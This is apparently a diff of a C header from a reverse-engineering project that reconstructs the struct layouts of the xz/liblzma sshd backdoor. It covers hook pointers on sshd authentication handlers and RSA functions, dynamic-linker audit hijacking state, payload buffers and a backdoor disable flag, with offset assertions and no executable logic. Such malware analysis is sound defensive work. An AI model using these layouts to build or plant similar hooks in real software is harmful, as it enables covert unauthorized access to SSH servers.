1015 assert_offset(imported_funcs_t, EC_KEY_get0_group, 0x50);
+
1016 assert_offset(imported_funcs_t, EVP_sha256, 0x58);
+
1017 assert_offset(imported_funcs_t, RSA_get0_key, 0x60);
+
1018 assert_offset(imported_funcs_t, BN_num_bits, 0x68);
+
1019 assert_offset(imported_funcs_t, EVP_PKEY_new_raw_public_key, 0x70);
+
1020 assert_offset(imported_funcs_t, EVP_MD_CTX_new, 0x78);
+
1021 assert_offset(imported_funcs_t, EVP_DigestVerifyInit, 0x80);
+
1022 assert_offset(imported_funcs_t, EVP_DigestVerify, 0x88);
+
1023 assert_offset(imported_funcs_t, EVP_MD_CTX_free, 0x90);
+
1024 assert_offset(imported_funcs_t, EVP_PKEY_free, 0x98);
+
1025 assert_offset(imported_funcs_t, EVP_CIPHER_CTX_new, 0xA0);
+
1026 assert_offset(imported_funcs_t, EVP_DecryptInit_ex, 0xA8);
+
1027 assert_offset(imported_funcs_t, EVP_DecryptUpdate, 0xB0);
+
1028 assert_offset(imported_funcs_t, EVP_DecryptFinal_ex, 0xB8);
+
1029 assert_offset(imported_funcs_t, EVP_CIPHER_CTX_free, 0xC0);
+
1030 assert_offset(imported_funcs_t, EVP_chacha20, 0xC8);
+
1031 assert_offset(imported_funcs_t, RSA_new, 0xD0);
+
1032 assert_offset(imported_funcs_t, BN_dup, 0xD8);
+
1033 assert_offset(imported_funcs_t, BN_bin2bn, 0xE0);
+
1034 assert_offset(imported_funcs_t, RSA_set0_key, 0xE8);
+
1035 assert_offset(imported_funcs_t, EVP_Digest, 0xF0);
+
1036 assert_offset(imported_funcs_t, RSA_sign, 0xF8);
+
1037 assert_offset(imported_funcs_t, BN_bn2bin, 0x100);
+
1038 assert_offset(imported_funcs_t, RSA_free, 0x108);
+
1039 assert_offset(imported_funcs_t, BN_free, 0x110);
+
1040 assert_offset(imported_funcs_t, libc, 0x118);
+
1041 assert_offset(imported_funcs_t, resolved_imports_count, 0x120);
+
1042 static_assert(sizeof(imported_funcs_t) == 0x128);
1043 
-
1044 typedef int (*sshd_monitor_func_t)(struct ssh *ssh, int sock, struct sshbuf *m);
-
1045 
-
1046 typedef struct __attribute__((packed)) sshd_ctx {
-
1047  BOOL have_mm_answer_keyallowed;
-
1048  BOOL have_mm_answer_authpassword;
-
1049  BOOL have_mm_answer_keyverify;
-
1050  PADDING(0x4);
-
1051  sshd_monitor_func_t mm_answer_authpassword_hook;
-
1052  PADDING(0x8);
-
1053  // Used to initialize *mm_answer_keyverify_ptr
-
1054  void *mm_answer_keyverify;
-
1055  void *mm_answer_authpassword_start;
-
1056  void *mm_answer_authpassword_end;
-
1057  sshd_monitor_func_t *mm_answer_authpassword_ptr;
-
1058  int monitor_reqtype_authpassword;
-
1059  PADDING(4);
-
1060  void *mm_answer_keyallowed_start;
-
1061  void *mm_answer_keyallowed_end;
-
1062  void *mm_answer_keyallowed_ptr;
-
1063  PADDING(sizeof(void *));
-
1064  void *mm_answer_keyverify_start;
-
1065  void *mm_answer_keyverify_end;
-
1066  void *mm_answer_keyverify_ptr;
-
1067  PADDING(0x4);
-
1068  u16 writebuf_size;
-
1069  PADDING(0x2);
-
1070  u8 *writebuf;
-
1071  PADDING(0x8);
-
1072  PADDING(0x8);
-
1073  char *STR_unknown_ptr;
-
1074  void *mm_request_send_start;
-
1075  void *mm_request_send_end;
-
1076  PADDING(sizeof(u32)); // BOOL?
-
1077  PADDING(sizeof(u32)); // BOOL?
-
1078  int *use_pam_ptr;
-
1079  int *permit_root_login_ptr;
-
1080  char *STR_without_password;
-
1081  char *STR_publickey;
-
1082 } sshd_ctx_t;
-
1083 
-
1084 assert_offset(sshd_ctx_t, have_mm_answer_keyallowed, 0x0);
-
1085 assert_offset(sshd_ctx_t, have_mm_answer_authpassword, 0x4);
-
1086 assert_offset(sshd_ctx_t, have_mm_answer_keyverify, 0x8);
-
1087 assert_offset(sshd_ctx_t, mm_answer_authpassword_hook, 0x10);
-
1088 assert_offset(sshd_ctx_t, mm_answer_keyverify, 0x20);
-
1089 assert_offset(sshd_ctx_t, mm_answer_authpassword_start, 0x28);
-
1090 assert_offset(sshd_ctx_t, mm_answer_authpassword_end, 0x30);
-
1091 assert_offset(sshd_ctx_t, mm_answer_authpassword_ptr, 0x38);
-
1092 assert_offset(sshd_ctx_t, monitor_reqtype_authpassword, 0x40);
-
1093 assert_offset(sshd_ctx_t, mm_answer_keyallowed_start, 0x48);
-
1094 assert_offset(sshd_ctx_t, mm_answer_keyallowed_end, 0x50);
-
1095 assert_offset(sshd_ctx_t, mm_answer_keyallowed_ptr, 0x58);
-
1096 assert_offset(sshd_ctx_t, mm_answer_keyverify_start, 0x68);
-
1097 assert_offset(sshd_ctx_t, mm_answer_keyverify_end, 0x70);
-
1098 assert_offset(sshd_ctx_t, mm_answer_keyverify_ptr, 0x78);
-
1099 assert_offset(sshd_ctx_t, writebuf_size, 0x84);
-
1100 assert_offset(sshd_ctx_t, writebuf, 0x88);
-
1101 assert_offset(sshd_ctx_t, STR_unknown_ptr, 0xA0);
-
1102 assert_offset(sshd_ctx_t, mm_request_send_start, 0xA8);
-
1103 assert_offset(sshd_ctx_t, mm_request_send_end, 0xB0);
-
1104 assert_offset(sshd_ctx_t, use_pam_ptr, 0xC0);
-
1105 assert_offset(sshd_ctx_t, permit_root_login_ptr, 0xC8);
-
1106 assert_offset(sshd_ctx_t, STR_without_password, 0xD0);
-
1107 assert_offset(sshd_ctx_t, STR_publickey, 0xD8);
-
1108 
-
1109 typedef struct __attribute__((packed)) sshd_log_ctx {
-
1110  PADDING(0x8);
-
1111  PADDING(0x8);
-
1112  char *STR_percent_s;
-
1113  char *STR_Connection_closed_by;
-
1114  char *STR_preauth;
-
1115  char *STR_authenticating;
-
1116  char *STR_user;
-
1117  PADDING(0x8);
-
1118  PADDING(0x8);
-
1119  PADDING(0x8);
-
1120  PADDING(0x8);
-
1121  void *sshlogv;
-
1122  void (*mm_log_handler)(int level, int forced, const char *msg, void *ctx);
-
1123 } sshd_log_ctx_t;
-
1124 
-
1125 assert_offset(sshd_log_ctx_t, STR_percent_s, 0x10);
-
1126 assert_offset(sshd_log_ctx_t, STR_Connection_closed_by, 0x18);
-
1127 assert_offset(sshd_log_ctx_t, STR_preauth, 0x20);
-
1128 assert_offset(sshd_log_ctx_t, STR_authenticating, 0x28);
-
1129 assert_offset(sshd_log_ctx_t, STR_user, 0x30);
-
1130 assert_offset(sshd_log_ctx_t, sshlogv, 0x58);
-
1131 assert_offset(sshd_log_ctx_t, mm_log_handler, 0x60);
-
1132 static_assert(sizeof(sshd_log_ctx_t) == 0x68);
-
1133 
-
1134 typedef struct __attribute__((packed)) sshd_offsets {
-
1135  u8 kex_qword_index;
-
1136  u8 pkex_offset;
-
1137  u8 sshbuf_data_qword_index;
-
1138  u8 sshbuf_size_qword_index;
-
1139 } sshd_offsets_t;
-
1140 
-
1141 typedef struct __attribute__((packed)) sshd_payload_ctx {
-
1142 } sshd_payload_ctx_t;
-
1143 
-
1144 typedef struct __attribute__((packed)) global_context {
-
1145  BOOL uses_endbr64;
-
1146  PADDING(4);
-
1150  imported_funcs_t *imported_funcs;
-
1154  libc_imports_t* libc_imports;
-
1164  BOOL disable_backdoor;
-
1165  PADDING(4);
-
1166  sshd_ctx_t *sshd_ctx;
-
1167  struct sensitive_data *sshd_sensitive_data;
-
1168  sshd_log_ctx_t *sshd_log_ctx;
-
1172  char *STR_ssh_rsa_cert_v01_openssh_com;
-
1176  char *STR_rsa_sha2_256;
-
1177  struct monitor **struct_monitor_ptr_address;
-
1178  u32 exit_flag;
-
1179  sshd_offsets_t sshd_offsets;
-
1180 
-
1184  void *sshd_code_start;
-
1188  void *sshd_code_end;
-
1192  void *sshd_data_start;
-
1196  void *sshd_data_end;
-
1197  void *sshd_main;
-
1204  void *lzma_code_start;
-
1211  void *lzma_code_end;
-
1212  u32 uid;
-
1213  PADDING(4);
-
1214  u64 sock_read_buf_size;
-
1215  u8 sock_read_buf[64];
-
1216  u64 payload_data_size;
-
1217  u64 digest_offset;
-
1218  // signed data (size payload_data_size)
-
1219  u8 *payload_data;
-
1220  sshd_payload_ctx_t *sshd_payload_ctx;
-
1221  u32 sshd_host_pubkey_idx;
-
1222  u32 payload_state;
-
1226  u8 secret_data[ED448_KEY_SIZE];
-
1232  u8 shift_operations[31];
-
1236  u32 num_shifted_bits;
-
1237  PADDING(4);
-
1238 } global_context_t;
-
1239 
-
1240 assert_offset(global_context_t, uses_endbr64, 0x0);
-
1241 assert_offset(global_context_t, imported_funcs, 0x8);
-
1242 assert_offset(global_context_t, libc_imports, 0x10);
-
1243 assert_offset(global_context_t, disable_backdoor, 0x18);
-
1244 assert_offset(global_context_t, sshd_ctx, 0x20);
-
1245 assert_offset(global_context_t, sshd_sensitive_data, 0x28);
-
1246 assert_offset(global_context_t, sshd_log_ctx, 0x30);
-
1247 assert_offset(global_context_t, STR_ssh_rsa_cert_v01_openssh_com, 0x38);
-
1248 assert_offset(global_context_t, STR_rsa_sha2_256, 0x40);
-
1249 assert_offset(global_context_t, struct_monitor_ptr_address, 0x48);
-
1250 assert_offset(global_context_t, exit_flag, 0x50);
-
1251 assert_offset(global_context_t, sshd_offsets, 0x54);
-
1252 assert_offset(global_context_t, sshd_code_start, 0x58);
-
1253 assert_offset(global_context_t, sshd_code_end, 0x60);
-
1254 assert_offset(global_context_t, sshd_data_start, 0x68);
-
1255 assert_offset(global_context_t, sshd_data_end, 0x70);
-
1256 assert_offset(global_context_t, lzma_code_start, 0x80);
-
1257 assert_offset(global_context_t, lzma_code_end, 0x88);
-
1258 assert_offset(global_context_t, uid, 0x90);
-
1259 assert_offset(global_context_t, sock_read_buf_size, 0x98);
-
1260 assert_offset(global_context_t, sock_read_buf, 0xA0);
-
1261 assert_offset(global_context_t, payload_data_size, 0xE0);
-
1262 assert_offset(global_context_t, digest_offset, 0xE8);
-
1263 assert_offset(global_context_t, payload_data, 0xF0);
-
1264 assert_offset(global_context_t, sshd_payload_ctx, 0xF8);
-
1265 assert_offset(global_context_t, sshd_host_pubkey_idx, 0x100);
-
1266 assert_offset(global_context_t, payload_state, 0x104);
-
1267 assert_offset(global_context_t, secret_data, 0x108);
-
1268 assert_offset(global_context_t, shift_operations, 0x141);
-
1269 assert_offset(global_context_t, num_shifted_bits, 0x160);
-
1270 static_assert(sizeof(global_context_t) == 0x168);
-
1271 
-
1272 typedef struct __attribute__((packed)) backdoor_shared_globals {
-
1273  sshd_monitor_func_t mm_answer_authpassword_hook;
-
1277  pfn_EVP_PKEY_set1_RSA_t hook_EVP_PKEY_set1_RSA;
-
1278  global_context_t **globals;
-
1279 } backdoor_shared_globals_t;
-
1280 
-
1281 assert_offset(backdoor_shared_globals_t, mm_answer_authpassword_hook, 0x0);
-
1282 assert_offset(backdoor_shared_globals_t, hook_EVP_PKEY_set1_RSA, 0x8);
-
1283 assert_offset(backdoor_shared_globals_t, globals, 0x10);
-
1284 static_assert(sizeof(backdoor_shared_globals_t) == 0x18);
-
1285 
-
1286 typedef struct __attribute__((packed)) ldso_ctx {
-
1287  PADDING(0x40);
-
1298  void *libcrypto_auditstate_bindflags_ptr;
-
1303  void *libcrypto_auditstate_bindflags_old_value;
-
1314  void *sshd_auditstate_bindflags_ptr;
-
1319  void *sshd_auditstate_bindflags_old_value;
-
1328  void* sshd_link_map_l_audit_any_plt_addr;
-
1335  u8 link_map_l_audit_any_plt_bitmask;
-
1336  PADDING(0x7);
-
1345  struct audit_ifaces **_dl_audit_ptr;
-
1354  unsigned int *_dl_naudit_ptr;
-
1363  struct audit_ifaces hooked_audit_ifaces;
-
1364  PADDING(0x30);
-
1371  char **libcrypto_l_name;
-
1378  void (*_dl_audit_symbind_alt)(struct link_map *l, const ElfW(Sym) *ref, void **value, lookup_t result);
-
1383  size_t _dl_audit_symbind_alt__size;
-
1388  pfn_RSA_public_decrypt_t hook_RSA_public_decrypt;
-
1394  pfn_EVP_PKEY_set1_RSA_t hook_EVP_PKEY_set1_RSA;
-
1399  pfn_RSA_get0_key_t hook_RSA_get0_key;
-
1400  imported_funcs_t *imported_funcs;
-
1401  u64 hooks_installed;
-
1402 } ldso_ctx_t;
-
1403 
-
1404 assert_offset(ldso_ctx_t, libcrypto_auditstate_bindflags_ptr, 0x40);
-
1405 assert_offset(ldso_ctx_t, libcrypto_auditstate_bindflags_old_value, 0x48);
-
1406 assert_offset(ldso_ctx_t, sshd_auditstate_bindflags_ptr, 0x50);
-
1407 assert_offset(ldso_ctx_t, sshd_auditstate_bindflags_old_value, 0x58);
-
1408 assert_offset(ldso_ctx_t, sshd_link_map_l_audit_any_plt_addr, 0x60);
-
1409 assert_offset(ldso_ctx_t, link_map_l_audit_any_plt_bitmask, 0x68);
-
1410 assert_offset(ldso_ctx_t, _dl_audit_ptr, 0x70);
-
1411 assert_offset(ldso_ctx_t, _dl_naudit_ptr, 0x78);
-
1412 assert_offset(ldso_ctx_t, hooked_audit_ifaces, 0x80);
-
1413 static_assert(sizeof(struct audit_ifaces) == 0x48);
-
1414 assert_offset(ldso_ctx_t, libcrypto_l_name, 0xF8);
-
1415 assert_offset(ldso_ctx_t, _dl_audit_symbind_alt, 0x100);
-
1416 assert_offset(ldso_ctx_t, _dl_audit_symbind_alt__size, 0x108);
-
1417 assert_offset(ldso_ctx_t, hook_RSA_public_decrypt, 0x110);
-
1418 assert_offset(ldso_ctx_t, hook_EVP_PKEY_set1_RSA, 0x118);
-
1419 assert_offset(ldso_ctx_t, hook_RSA_get0_key, 0x120);
-
1420 assert_offset(ldso_ctx_t, imported_funcs, 0x128);
-
1421 assert_offset(ldso_ctx_t, hooks_installed, 0x130);
-
1422 static_assert(sizeof(ldso_ctx_t) == 0x138);
-
1423 
-
1424 
-
1425 typedef struct __attribute__((packed)) backdoor_hooks_data {
-
1426  ldso_ctx_t ldso_ctx;
-
1427  global_context_t global_ctx;
-
1428  imported_funcs_t imported_funcs;
-
1429  sshd_ctx_t sshd_ctx;
-
1430  libc_imports_t libc_imports;
-
1431  sshd_log_ctx_t sshd_log_ctx;
-
1432  u64 signed_data_size;
-
1433  u8 signed_data;
-
1434 } backdoor_hooks_data_t;
-
1435 
-
1436 assert_offset(backdoor_hooks_data_t, ldso_ctx, 0);
-
1437 assert_offset(backdoor_hooks_data_t, global_ctx, 0x138);
-
1438 assert_offset(backdoor_hooks_data_t, imported_funcs, 0x2A0);
-
1439 assert_offset(backdoor_hooks_data_t, sshd_ctx, 0x3C8);
-
1440 assert_offset(backdoor_hooks_data_t, libc_imports, 0x4A8);
-
1441 assert_offset(backdoor_hooks_data_t, sshd_log_ctx, 0x518);
-
1442 assert_offset(backdoor_hooks_data_t, signed_data_size, 0x580);
-
1443 assert_offset(backdoor_hooks_data_t, signed_data, 0x588);
-
1444 static_assert(sizeof(backdoor_hooks_data_t) >= 0x589);
-
1445 
-
1446 typedef enum {
-
1447  SYSLOG_LEVEL_QUIET,
-
1448  SYSLOG_LEVEL_FATAL,
-
1449  SYSLOG_LEVEL_ERROR,
-
1450  SYSLOG_LEVEL_INFO,
-
1451  SYSLOG_LEVEL_VERBOSE,
-
1452  SYSLOG_LEVEL_DEBUG1,
-
1453  SYSLOG_LEVEL_DEBUG2,
-
1454  SYSLOG_LEVEL_DEBUG3,
-
1455  SYSLOG_LEVEL_NOT_SET = -1
-
1456 } LogLevel;
-
1457 typedef void (*log_handler_fn)(
-
1458  LogLevel level,
-
1459  int forced,
-
1460  const char *msg,
-
1461  void *ctx);
-
1462 
-
1463 typedef struct __attribute__((packed)) backdoor_hooks_ctx {
-
1464  PADDING(0x30);
-
1465  backdoor_shared_globals_t *shared;
-
1466  backdoor_hooks_data_t **hooks_data_addr;
-
1467  uintptr_t (*symbind64)(
-
1468  Elf64_Sym *sym, unsigned int ndx,
-
1469  uptr *refcook, uptr *defcook,
-
1470  unsigned int flags, const char *symname);
-
1471  pfn_RSA_public_decrypt_t hook_RSA_public_decrypt;
-
1472  pfn_RSA_get0_key_t hook_RSA_get0_key;
-
1473  log_handler_fn mm_log_handler;
-
1474  PADDING(sizeof(void *));
-
1475  PADDING(sizeof(void *));
-
1476  sshd_monitor_func_t mm_answer_keyallowed;
-
1477  sshd_monitor_func_t mm_answer_keyverify;
-
1478  PADDING(sizeof(void *));
-
1479 } backdoor_hooks_ctx_t;
-
1480 
-
1481 assert_offset(backdoor_hooks_ctx_t, shared, 0x30);
-
1482 assert_offset(backdoor_hooks_ctx_t, hooks_data_addr, 0x38);
-
1483 assert_offset(backdoor_hooks_ctx_t, symbind64, 0x40);
-
1484 assert_offset(backdoor_hooks_ctx_t, hook_RSA_public_decrypt, 0x48);
-
1485 assert_offset(backdoor_hooks_ctx_t, hook_RSA_get0_key, 0x50);
-
1486 assert_offset(backdoor_hooks_ctx_t, mm_log_handler, 0x58);
-
1487 assert_offset(backdoor_hooks_ctx_t, mm_answer_keyallowed, 0x70);
-
1488 assert_offset(backdoor_hooks_ctx_t, mm_answer_keyverify, 0x78);
-
1489 static_assert(sizeof(backdoor_hooks_ctx_t) == 0x88);
-
1490 
-
1491 typedef struct __attribute__((packed)) backdoor_setup_params {
-
1492  PADDING(0x8);
-
1493  backdoor_shared_globals_t *shared;
-
1494  backdoor_hooks_ctx_t *hook_params;
-
1495  lzma_check_state dummy_check_state;
-
1496  elf_entry_ctx_t *entry_ctx;
-
1497 } backdoor_setup_params_t;
-
1498 
-
1499 assert_offset(backdoor_setup_params_t, shared, 0x8);
-
1500 assert_offset(backdoor_setup_params_t, hook_params, 0x10);
-
1501 assert_offset(backdoor_setup_params_t, entry_ctx, 0x80);
-
1502 static_assert(sizeof(backdoor_setup_params_t) == 0x88);
-
1503 
-
1508 typedef struct __attribute__((packed)) elf_handles {
-
1513  elf_info_t *main;
-
1519  elf_info_t *dynamic_linker;
-
1520  elf_info_t *libc;
-
1521  elf_info_t *liblzma;
-
1522  elf_info_t *libcrypto;
-
1523 } elf_handles_t;
-
1524 
-
1525 assert_offset(elf_handles_t, main, 0x0);
-
1526 assert_offset(elf_handles_t, dynamic_linker, 0x8);
-
1527 assert_offset(elf_handles_t, libc, 0x10);
-
1528 assert_offset(elf_handles_t, liblzma, 0x18);
-
1529 assert_offset(elf_handles_t, libcrypto, 0x20);
-
1530 static_assert(sizeof(elf_handles_t) == 0x28);
-
1531 
-
1532 typedef struct __attribute__((packed)) main_elf {
-
1533  elf_handles_t *elf_handles;
-
1534  Elf64_Ehdr *dynamic_linker_ehdr;
-
1535  void **__libc_stack_end;
-
1536 } main_elf_t;
+
1044 struct ssh;
+
1045 struct sshbuf;
+
1046 
+
1047 typedef int (*sshd_monitor_func_t)(struct ssh *ssh, int sock, struct sshbuf *m);
+
1048 
+
1049 typedef struct __attribute__((packed)) sshd_ctx {
+
1050  BOOL have_mm_answer_keyallowed;
+
1051  BOOL have_mm_answer_authpassword;
+
1052  BOOL have_mm_answer_keyverify;
+
1053  PADDING(0x4);
+
1054  sshd_monitor_func_t mm_answer_authpassword_hook;
+
1055  PADDING(0x8);
+
1056  // Used to initialize *mm_answer_keyverify_ptr
+
1057  void *mm_answer_keyverify;
+
1058  void *mm_answer_authpassword_start;
+
1059  void *mm_answer_authpassword_end;
+
1060  sshd_monitor_func_t *mm_answer_authpassword_ptr;
+
1061  int monitor_reqtype_authpassword;
+
1062  PADDING(4);
+
1063  void *mm_answer_keyallowed_start;
+
1064  void *mm_answer_keyallowed_end;
+
1065  void *mm_answer_keyallowed_ptr;
+
1066  PADDING(sizeof(void *));
+
1067  void *mm_answer_keyverify_start;
+
1068  void *mm_answer_keyverify_end;
+
1069  void *mm_answer_keyverify_ptr;
+
1070  PADDING(0x4);
+
1071  u16 writebuf_size;
+
1072  PADDING(0x2);
+
1073  u8 *writebuf;
+
1074  PADDING(0x8);
+
1075  PADDING(0x8);
+
1076  char *STR_unknown_ptr;
+
1077  void *mm_request_send_start;
+
1078  void *mm_request_send_end;
+
1079  PADDING(sizeof(u32)); // BOOL?
+
1080  PADDING(sizeof(u32)); // BOOL?
+
1081  int *use_pam_ptr;
+
1082  int *permit_root_login_ptr;
+
1083  char *STR_without_password;
+
1084  char *STR_publickey;
+
1085 } sshd_ctx_t;
+
1086 
+
1087 assert_offset(sshd_ctx_t, have_mm_answer_keyallowed, 0x0);
+
1088 assert_offset(sshd_ctx_t, have_mm_answer_authpassword, 0x4);
+
1089 assert_offset(sshd_ctx_t, have_mm_answer_keyverify, 0x8);
+
1090 assert_offset(sshd_ctx_t, mm_answer_authpassword_hook, 0x10);
+
1091 assert_offset(sshd_ctx_t, mm_answer_keyverify, 0x20);
+
1092 assert_offset(sshd_ctx_t, mm_answer_authpassword_start, 0x28);
+
1093 assert_offset(sshd_ctx_t, mm_answer_authpassword_end, 0x30);
+
1094 assert_offset(sshd_ctx_t, mm_answer_authpassword_ptr, 0x38);
+
1095 assert_offset(sshd_ctx_t, monitor_reqtype_authpassword, 0x40);
+
1096 assert_offset(sshd_ctx_t, mm_answer_keyallowed_start, 0x48);
+
1097 assert_offset(sshd_ctx_t, mm_answer_keyallowed_end, 0x50);
+
1098 assert_offset(sshd_ctx_t, mm_answer_keyallowed_ptr, 0x58);
+
1099 assert_offset(sshd_ctx_t, mm_answer_keyverify_start, 0x68);
+
1100 assert_offset(sshd_ctx_t, mm_answer_keyverify_end, 0x70);
+
1101 assert_offset(sshd_ctx_t, mm_answer_keyverify_ptr, 0x78);
+
1102 assert_offset(sshd_ctx_t, writebuf_size, 0x84);
+
1103 assert_offset(sshd_ctx_t, writebuf, 0x88);
+
1104 assert_offset(sshd_ctx_t, STR_unknown_ptr, 0xA0);
+
1105 assert_offset(sshd_ctx_t, mm_request_send_start, 0xA8);
+
1106 assert_offset(sshd_ctx_t, mm_request_send_end, 0xB0);
+
1107 assert_offset(sshd_ctx_t, use_pam_ptr, 0xC0);
+
1108 assert_offset(sshd_ctx_t, permit_root_login_ptr, 0xC8);
+
1109 assert_offset(sshd_ctx_t, STR_without_password, 0xD0);
+
1110 assert_offset(sshd_ctx_t, STR_publickey, 0xD8);
+
1111 
+
1112 typedef struct __attribute__((packed)) sshd_log_ctx {
+
1113  PADDING(4);
+
1114  BOOL unkbool_log_handler;
+
1115  BOOL syslog_disabled;
+
1116  PADDING(4);
+
1117  char *STR_percent_s;
+
1118  char *STR_Connection_closed_by;
+
1119  char *STR_preauth;
+
1120  char *STR_authenticating;
+
1121  char *STR_user;
+
1122  PADDING(0x8);
+
1123  PADDING(0x8);
+
1124  PADDING(0x8);
+
1125  PADDING(0x8);
+
1126  void *sshlogv;
+
1127  void (*mm_log_handler)(int level, int forced, const char *msg, void *ctx);
+
1128 } sshd_log_ctx_t;
+
1129 
+
1130 assert_offset(sshd_log_ctx_t, syslog_disabled, 0x8);
+
1131 assert_offset(sshd_log_ctx_t, STR_percent_s, 0x10);
+
1132 assert_offset(sshd_log_ctx_t, STR_Connection_closed_by, 0x18);
+
1133 assert_offset(sshd_log_ctx_t, STR_preauth, 0x20);
+
1134 assert_offset(sshd_log_ctx_t, STR_authenticating, 0x28);
+
1135 assert_offset(sshd_log_ctx_t, STR_user, 0x30);
+
1136 assert_offset(sshd_log_ctx_t, sshlogv, 0x58);
+
1137 assert_offset(sshd_log_ctx_t, mm_log_handler, 0x60);
+
1138 static_assert(sizeof(sshd_log_ctx_t) == 0x68);
+
1139 
+
1140 typedef struct __attribute__((packed)) sshd_offsets {
+
1141  u8 kex_qword_index;
+
1142  u8 pkex_offset;
+
1143  u8 sshbuf_data_qword_index;
+
1144  u8 sshbuf_size_qword_index;
+
1145 } sshd_offsets_t;
+
1146 
+
1147 typedef struct __attribute__((packed)) sshd_payload_ctx {
+
1148 } sshd_payload_ctx_t;
+
1149 
+
1150 typedef struct __attribute__((packed)) global_context {
+
1151  BOOL uses_endbr64;
+
1152  PADDING(4);
+
1156  imported_funcs_t *imported_funcs;
+
1160  libc_imports_t* libc_imports;
+
1170  BOOL disable_backdoor;
+
1171  PADDING(4);
+
1172  sshd_ctx_t *sshd_ctx;
+
1173  struct sensitive_data *sshd_sensitive_data;
+
1174  sshd_log_ctx_t *sshd_log_ctx;
+
1178  char *STR_ssh_rsa_cert_v01_openssh_com;
+
1182  char *STR_rsa_sha2_256;
+
1183  struct monitor **struct_monitor_ptr_address;
+
1184  u32 exit_flag;
+
1185  sshd_offsets_t sshd_offsets;
+
1186 
+
1190  void *sshd_code_start;
+
1194  void *sshd_code_end;
+
1198  void *sshd_data_start;
+
1202  void *sshd_data_end;
+
1203  void *sshd_main;
+
1210  void *lzma_code_start;
+
1217  void *lzma_code_end;
+
1218  u32 uid;
+
1219  PADDING(4);
+
1220  u64 sock_read_buf_size;
+
1221  u8 sock_read_buf[64];
+
1222  u64 payload_data_size;
+
1223  u64 digest_offset;
+
1224  // signed data (size payload_data_size)
+
1225  u8 *payload_data;
+
1226  sshd_payload_ctx_t *sshd_payload_ctx;
+
1227  u32 sshd_host_pubkey_idx;
+
1228  u32 payload_state;
+
1232  u8 secret_data[ED448_KEY_SIZE];
+
1238  u8 shift_operations[31];
+
1242  u32 num_shifted_bits;
+
1243  PADDING(4);
+
1244 } global_context_t;
+
1245 
+
1246 assert_offset(global_context_t, uses_endbr64, 0x0);
+
1247 assert_offset(global_context_t, imported_funcs, 0x8);
+
1248 assert_offset(global_context_t, libc_imports, 0x10);
+
1249 assert_offset(global_context_t, disable_backdoor, 0x18);
+
1250 assert_offset(global_context_t, sshd_ctx, 0x20);
+
1251 assert_offset(global_context_t, sshd_sensitive_data, 0x28);
+
1252 assert_offset(global_context_t, sshd_log_ctx, 0x30);
+
1253 assert_offset(global_context_t, STR_ssh_rsa_cert_v01_openssh_com, 0x38);
+
1254 assert_offset(global_context_t, STR_rsa_sha2_256, 0x40);
+
1255 assert_offset(global_context_t, struct_monitor_ptr_address, 0x48);
+
1256 assert_offset(global_context_t, exit_flag, 0x50);
+
1257 assert_offset(global_context_t, sshd_offsets, 0x54);
+
1258 assert_offset(global_context_t, sshd_code_start, 0x58);
+
1259 assert_offset(global_context_t, sshd_code_end, 0x60);
+
1260 assert_offset(global_context_t, sshd_data_start, 0x68);
+
1261 assert_offset(global_context_t, sshd_data_end, 0x70);
+
1262 assert_offset(global_context_t, lzma_code_start, 0x80);
+
1263 assert_offset(global_context_t, lzma_code_end, 0x88);
+
1264 assert_offset(global_context_t, uid, 0x90);
+
1265 assert_offset(global_context_t, sock_read_buf_size, 0x98);
+
1266 assert_offset(global_context_t, sock_read_buf, 0xA0);
+
1267 assert_offset(global_context_t, payload_data_size, 0xE0);
+
1268 assert_offset(global_context_t, digest_offset, 0xE8);
+
1269 assert_offset(global_context_t, payload_data, 0xF0);
+
1270 assert_offset(global_context_t, sshd_payload_ctx, 0xF8);
+
1271 assert_offset(global_context_t, sshd_host_pubkey_idx, 0x100);
+
1272 assert_offset(global_context_t, payload_state, 0x104);
+
1273 assert_offset(global_context_t, secret_data, 0x108);
+
1274 assert_offset(global_context_t, shift_operations, 0x141);
+
1275 assert_offset(global_context_t, num_shifted_bits, 0x160);
+
1276 static_assert(sizeof(global_context_t) == 0x168);
+
1277 
+
1278 typedef struct __attribute__((packed)) backdoor_shared_globals {
+
1279  sshd_monitor_func_t mm_answer_authpassword_hook;
+
1283  pfn_EVP_PKEY_set1_RSA_t hook_EVP_PKEY_set1_RSA;
+
1284  global_context_t **globals;
+
1285 } backdoor_shared_globals_t;
+
1286 
+
1287 assert_offset(backdoor_shared_globals_t, mm_answer_authpassword_hook, 0x0);
+
1288 assert_offset(backdoor_shared_globals_t, hook_EVP_PKEY_set1_RSA, 0x8);
+
1289 assert_offset(backdoor_shared_globals_t, globals, 0x10);
+
1290 static_assert(sizeof(backdoor_shared_globals_t) == 0x18);
+
1291 
+
1292 typedef struct __attribute__((packed)) ldso_ctx {
+
1293  PADDING(0x40);
+
1304  void *libcrypto_auditstate_bindflags_ptr;
+
1309  void *libcrypto_auditstate_bindflags_old_value;
+
1320  void *sshd_auditstate_bindflags_ptr;
+
1325  void *sshd_auditstate_bindflags_old_value;
+
1334  void* sshd_link_map_l_audit_any_plt_addr;
+
1341  u8 link_map_l_audit_any_plt_bitmask;
+
1342  PADDING(0x7);
+
1351  struct audit_ifaces **_dl_audit_ptr;
+
1360  unsigned int *_dl_naudit_ptr;
+
1369  struct audit_ifaces hooked_audit_ifaces;
+
1370  PADDING(0x30);
+
1377  char **libcrypto_l_name;
+
1384  void (*_dl_audit_symbind_alt)(struct link_map *l, const ElfW(Sym) *ref, void **value, lookup_t result);
+
1389  size_t _dl_audit_symbind_alt__size;
+
1394  pfn_RSA_public_decrypt_t hook_RSA_public_decrypt;
+
1400  pfn_EVP_PKEY_set1_RSA_t hook_EVP_PKEY_set1_RSA;
+
1405  pfn_RSA_get0_key_t hook_RSA_get0_key;
+
1406  imported_funcs_t *imported_funcs;
+
1407  u64 hooks_installed;
+
1408 } ldso_ctx_t;
+
1409 
+
1410 assert_offset(ldso_ctx_t, libcrypto_auditstate_bindflags_ptr, 0x40);
+
1411 assert_offset(ldso_ctx_t, libcrypto_auditstate_bindflags_old_value, 0x48);
+
1412 assert_offset(ldso_ctx_t, sshd_auditstate_bindflags_ptr, 0x50);
+
1413 assert_offset(ldso_ctx_t, sshd_auditstate_bindflags_old_value, 0x58);
+
1414 assert_offset(ldso_ctx_t, sshd_link_map_l_audit_any_plt_addr, 0x60);
+
1415 assert_offset(ldso_ctx_t, link_map_l_audit_any_plt_bitmask, 0x68);
+
1416 assert_offset(ldso_ctx_t, _dl_audit_ptr, 0x70);
+
1417 assert_offset(ldso_ctx_t, _dl_naudit_ptr, 0x78);
+
1418 assert_offset(ldso_ctx_t, hooked_audit_ifaces, 0x80);
+
